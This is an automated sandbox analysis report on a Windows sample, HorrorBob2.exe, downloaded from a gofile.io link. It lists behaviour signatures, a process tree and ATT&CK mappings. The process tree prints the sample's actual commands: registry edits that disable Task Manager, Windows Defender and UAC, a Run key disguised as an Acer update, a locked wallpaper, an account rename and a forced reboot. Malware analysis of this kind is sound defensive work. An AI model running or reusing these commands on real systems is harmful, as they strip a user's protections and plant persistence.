Analysis
max time kernel: 21s
max time network: 23s
platform: windows10-2004_x64
resource: win10v2004-20250502-en
resource tags: arch:x64, arch:x86, image:win10v2004-20250502-en, locale:en-us, os:windows10-2004-x64, system
submitted: 19/05/2025, 15:18
Static task: static1
URLScan task: urlscan1
Behavioral task: behavioral1
Sample: https://gofile.io/d/ecYbbf
Resource: win10v2004-20250502-en
Errors
General
Target: https://gofile.io/d/ecYbbf
Malware Config
Signatures
Modifies Windows Defender DisableAntiSpyware settings
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" (reg.exe)
UAC bypass 3 TTPs 1 IoCs
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" (reg.exe)
Disables Task Manager via registry modification
Downloads MZ/PE file 1 IoCs
- flow 50, pid 1916 (chrome.exe)
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
- Key value queried: \REGISTRY\USER\S-1-5-21-2930597513-779029253-718817275-1000\Control Panel\International\Geo\Nation (HorrorBob2.exe)
Executes dropped EXE 2 IoCs
- pid 5004 (HorrorBob2.exe)
- pid 4392 (Service64.exe)
Adds Run key to start application 2 TTPs 1 IoCs
- Set value (str): \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Acer NitroSense Update = "C:\\Service64\\Service64.exe" (reg.exe)
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
- flow 11: api.gofile.io
- flow 17: api.gofile.io
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
- Set value (str): \REGISTRY\USER\S-1-5-21-2930597513-779029253-718817275-1000\Control Panel\Desktop\Wallpaper = "c:\\Service64\\blood.bmp" (reg.exe)
YARA rule matches (rule: upx)
- behavioral1/files/0x000b00000002410f-62.dat: upx
- behavioral1/memory/5004-85-0x0000000000400000-0x000000000132F000-memory.dmp: upx
- behavioral1/files/0x000d000000024114-119.dat: upx
- behavioral1/memory/4392-125-0x0000000000400000-0x00000000012E3000-memory.dmp: upx
- behavioral1/memory/5004-126-0x0000000000400000-0x000000000132F000-memory.dmp: upx
- behavioral1/memory/4392-146-0x0000000000400000-0x00000000012E3000-memory.dmp: upx
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
System Location Discovery: System Language Discovery 1 TTPs 14 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
- Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language by net.exe, shutdown.exe, cscript.exe, rundll32.exe, reg.exe, reg.exe, reg.exe, net1.exe, Service64.exe, HorrorBob2.exe, cmd.exe, reg.exe, reg.exe, reg.exe (14 entries)
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
- Key opened: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 (chrome.exe)
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier (chrome.exe)
Enumerates system info in registry 2 TTPs 3 IoCs
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName (chrome.exe)
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer (chrome.exe)
- Key opened: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS (chrome.exe)
Modifies data under HKEY_USERS 17 IoCs
- Set value (int): \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "56" (LogonUI.exe)
- Set value (int): \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" (LogonUI.exe)
- Key created: \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry (chrome.exe)
- Set value (data): \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00 (LogonUI.exe)
- Set value (int): \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040" (LogonUI.exe)
- Set value (int): \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040" (LogonUI.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History (LogonUI.exe)
- Set value (int): \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" (LogonUI.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM (LogonUI.exe)
- Set value (int): \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271" (LogonUI.exe)
- Set value (int): \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" (LogonUI.exe)
- Set value (int): \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133921415366163678" (chrome.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent (LogonUI.exe)
- Set value (int): \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271" (LogonUI.exe)
- Set value (int): \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" (LogonUI.exe)
- Set value (int): \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808" (LogonUI.exe)
- Set value (int): \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" (LogonUI.exe)
Modifies registry key 1 TTPs 3 IoCs
- pid 4456 (reg.exe)
- pid 3732 (reg.exe)
- pid 2344 (reg.exe)
Runs net.exe
Suspicious behavior: EnumeratesProcesses 2 IoCs
- pid 5112 (chrome.exe), 2 entries
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs
- pid 5112 (chrome.exe), 5 entries
Suspicious use of AdjustPrivilegeToken 34 IoCs
- Token: SeShutdownPrivilege and SeCreatePagefilePrivilege, pid 5112 (chrome.exe), 15 alternating pairs
- Token: SeShutdownPrivilege, pid 5472 (shutdown.exe)
- Token: SeRemoteShutdownPrivilege, pid 5472 (shutdown.exe)
- Token: SeShutdownPrivilege and SeCreatePagefilePrivilege, pid 5112 (chrome.exe), 1 further pair
Suspicious use of FindShellTrayWindow 36 IoCs
- pid 5112 (chrome.exe), 36 entries
Suspicious use of SendNotifyMessage 24 IoCs
- pid 5112 (chrome.exe), 24 entries
Suspicious use of SetWindowsHookEx 1 IoCs
- pid 3376 (LogonUI.exe)
Suspicious use of WriteProcessMemory 64 IoCs
- PID 5112 (chrome.exe) wrote to memory of 5924 (procid_target 86), 1916 (procid_target 87), 6128 (procid_target 88) and 4456 (procid_target 91); 64 entries in total, repeated per target
Processes
[1] C:\Program Files\Google\Chrome\Application\chrome.exe
    Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://gofile.io/d/ecYbbf
    - Checks processor information in registry
    - Enumerates system info in registry
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of WriteProcessMemory
    PID:5112
  [2] C:\Program Files\Google\Chrome\Application\chrome.exe
      Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff8e5a4dcf8,0x7ff8e5a4dd04,0x7ff8e5a4dd10
      PID:5924
  [2] C:\Program Files\Google\Chrome\Application\chrome.exe
      Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1564,i,3638664393125625333,1414262358886866268,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=2068 /prefetch:3
      - Downloads MZ/PE file
      PID:1916
  [2] C:\Program Files\Google\Chrome\Application\chrome.exe
      Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2044,i,3638664393125625333,1414262358886866268,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=2040 /prefetch:2
      PID:6128
  [2] C:\Program Files\Google\Chrome\Application\chrome.exe
      Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2200,i,3638664393125625333,1414262358886866268,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=2512 /prefetch:8
      PID:1584
  [2] C:\Program Files\Google\Chrome\Application\chrome.exe
      Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=2952,i,3638664393125625333,1414262358886866268,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=2976 /prefetch:1
      PID:1632
  [2] C:\Program Files\Google\Chrome\Application\chrome.exe
      Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=2964,i,3638664393125625333,1414262358886866268,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=3016 /prefetch:1
      PID:4456
  [2] C:\Program Files\Google\Chrome\Application\chrome.exe
      Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4136,i,3638664393125625333,1414262358886866268,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=4148 /prefetch:2
      PID:4936
  [2] C:\Program Files\Google\Chrome\Application\chrome.exe
      Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4680,i,3638664393125625333,1414262358886866268,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=4708 /prefetch:1
      PID:4580
  [2] C:\Program Files\Google\Chrome\Application\chrome.exe
      Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=4408,i,3638664393125625333,1414262358886866268,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=3020 /prefetch:1
      PID:2460
  [2] C:\Program Files\Google\Chrome\Application\chrome.exe
      Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5548,i,3638664393125625333,1414262358886866268,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=5572 /prefetch:8
      PID:6120
  [2] C:\Program Files\Google\Chrome\Application\chrome.exe
      Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5568,i,3638664393125625333,1414262358886866268,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=5472 /prefetch:8
      PID:452
  [2] C:\Users\Admin\Downloads\HorrorBob2.exe
      Command line: "C:\Users\Admin\Downloads\HorrorBob2.exe"
      - Checks computer location settings
      - Executes dropped EXE
      - System Location Discovery: System Language Discovery
      PID:5004
    [3] C:\Windows\SysWOW64\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\A73C.tmp\HorrorBob2.bat" "
        - System Location Discovery: System Language Discovery
        PID:4156
      [4] C:\Windows\SysWOW64\cscript.exe
          Command line: cscript prompt.vbs
          - System Location Discovery: System Language Discovery
          PID:1280
      [4] C:\Windows\SysWOW64\reg.exe
          Command line: reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
          - System Location Discovery: System Language Discovery
          - Modifies registry key
          PID:2344
      [4] C:\Windows\SysWOW64\reg.exe
          Command line: reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\Service64\blood.bmp /f
          - Sets desktop wallpaper using registry
          - System Location Discovery: System Language Discovery
          PID:4036
      [4] C:\Windows\SysWOW64\rundll32.exe
          Command line: RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
          - System Location Discovery: System Language Discovery
          PID:6052
      [4] C:\Windows\SysWOW64\reg.exe
          Command line: reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f
          - System Location Discovery: System Language Discovery
          - Modifies registry key
          PID:4456
      [4] C:\Windows\SysWOW64\reg.exe
          Command line: Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
          - Modifies Windows Defender DisableAntiSpyware settings
          - System Location Discovery: System Language Discovery
          PID:4768
      [4] C:\Windows\SysWOW64\reg.exe
          Command line: reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
          - UAC bypass
          - System Location Discovery: System Language Discovery
          - Modifies registry key
          PID:3732
      [4] C:\Windows\SysWOW64\reg.exe
          Command line: REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Acer NitroSense Update" /t REG_SZ /F /D "C:\Service64\Service64.exe"
          - Adds Run key to start application
          - System Location Discovery: System Language Discovery
          PID:4732
      [4] C:\Windows\SysWOW64\net.exe
          Command line: net user Admin /fullname:"SPONGEBOB IS WATCHING YOU!"
          - System Location Discovery: System Language Discovery
          PID:2756
        [5] C:\Windows\SysWOW64\net1.exe
            Command line: C:\Windows\system32\net1 user Admin /fullname:"SPONGEBOB IS WATCHING YOU!"
            - System Location Discovery: System Language Discovery
            PID:2988
      [4] C:\Windows\SysWOW64\shutdown.exe
          Command line: shutdown /r /t 00
          - System Location Discovery: System Language Discovery
          - Suspicious use of AdjustPrivilegeToken
          PID:5472
[1] C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
    Command line: "C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
    PID:5588
[1] C:\Windows\system32\svchost.exe
    Command line: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
    PID:5088
[1] C:\Windows\system32\cmd.exe
    Command line: C:\Windows\system32\cmd.exe /c C:\Service64\Service64.exe
    PID:4816
  [2] C:\Service64\Service64.exe
      Command line: C:\Service64\Service64.exe
      - Executes dropped EXE
      - System Location Discovery: System Language Discovery
      PID:4392
[1] C:\Windows\system32\LogonUI.exe
    Command line: "LogonUI.exe" /flags:0x4 /state0:0xa3977055 /state1:0x41c64e6d
    - Modifies data under HKEY_USERS
    - Suspicious use of SetWindowsHookEx
    PID:3376
Network
MITRE ATT&CK Enterprise v16
Persistence
- Boot or Logon Autostart Execution (1): Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (1): Windows Service (1)
Privilege Escalation
- Abuse Elevation Control Mechanism (1): Bypass User Account Control (1)
- Boot or Logon Autostart Execution (1): Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (1): Windows Service (1)
Defense Evasion
- Abuse Elevation Control Mechanism (1): Bypass User Account Control (1)
- Impair Defenses (2): Disable or Modify Tools (2)
- Modify Registry (5)
Downloads